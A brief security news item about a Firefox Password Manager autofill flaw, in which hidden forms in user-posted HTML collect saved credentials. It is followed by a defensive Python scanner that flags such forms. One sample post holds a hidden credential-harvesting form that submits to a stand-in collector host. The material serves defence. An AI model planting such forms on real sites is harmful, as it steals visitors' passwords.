Firefox Gives Away Passwords for Free
Chapin Information Services (CIS) have discovered a major flaw in the way Firefox's Password Manager automatically populates username and password fields on a web form. Whilst autofill is a major time saver, it also allows phishers to gather usernames and passwords without you knowing it, especially on weblogs and forums which allow posters to input HTML. Essentially, they would just create a hidden form that Firefox would automatically populate with your username and password for that site, and the form would then be submitted to the phisher's server when you click a link or hit enter. This doesn't use cross-site scripting (XSS) methods either, as it's essentially gathering passwords for the site you're actually visiting (hence most phishing detectors won't pick this up).
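For a site that accepts HTML from posters, one server-side check is to flag any submitted markup containing a form with a password field, and to note whether its action points off-site. The sketch below is an added example, not code from CIS or Mozilla; the class and function names and the host names in the sample posts are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormFinder(HTMLParser):
    """Collects <form> elements in user-submitted HTML that contain a password field."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []   # one dict per flagged form
        self._form = None    # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._close_form()  # forms cannot nest; a new <form> ends the previous one
            self._form = {"action": a.get("action", ""), "has_password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._close_form()

    def close(self):
        super().close()
        self._close_form()  # an unclosed <form> still counts

    def _close_form(self):
        form, self._form = self._form, None
        if form and form["has_password"]:
            # An empty or relative action submits to the hosting site itself.
            host = urlparse(form["action"]).hostname or self.site_host
            form["off_site"] = host != self.site_host
            self.findings.append(form)


def scan_post(html, site_host):
    """Return the password-bearing forms found in one user-submitted post."""
    finder = CredentialFormFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample posts (not taken from any real site).
POST_PLAIN = '<p>Nice article, see <a href="https://example.org/">this</a>.</p>'
POST_HIDDEN_FORM = ('<p>Great post!</p><form action="https://collector.example/c" style="display:none">'
                    '<input type="text" name="user"><input type="PASSWORD" name="pass"></form>')
POST_UNCLOSED = '<form action="/search"><input type="password" name="p">'
```

A post that produces any finding can be rejected or stripped of form elements before it is stored; an `off_site` finding is the case the advisory describes.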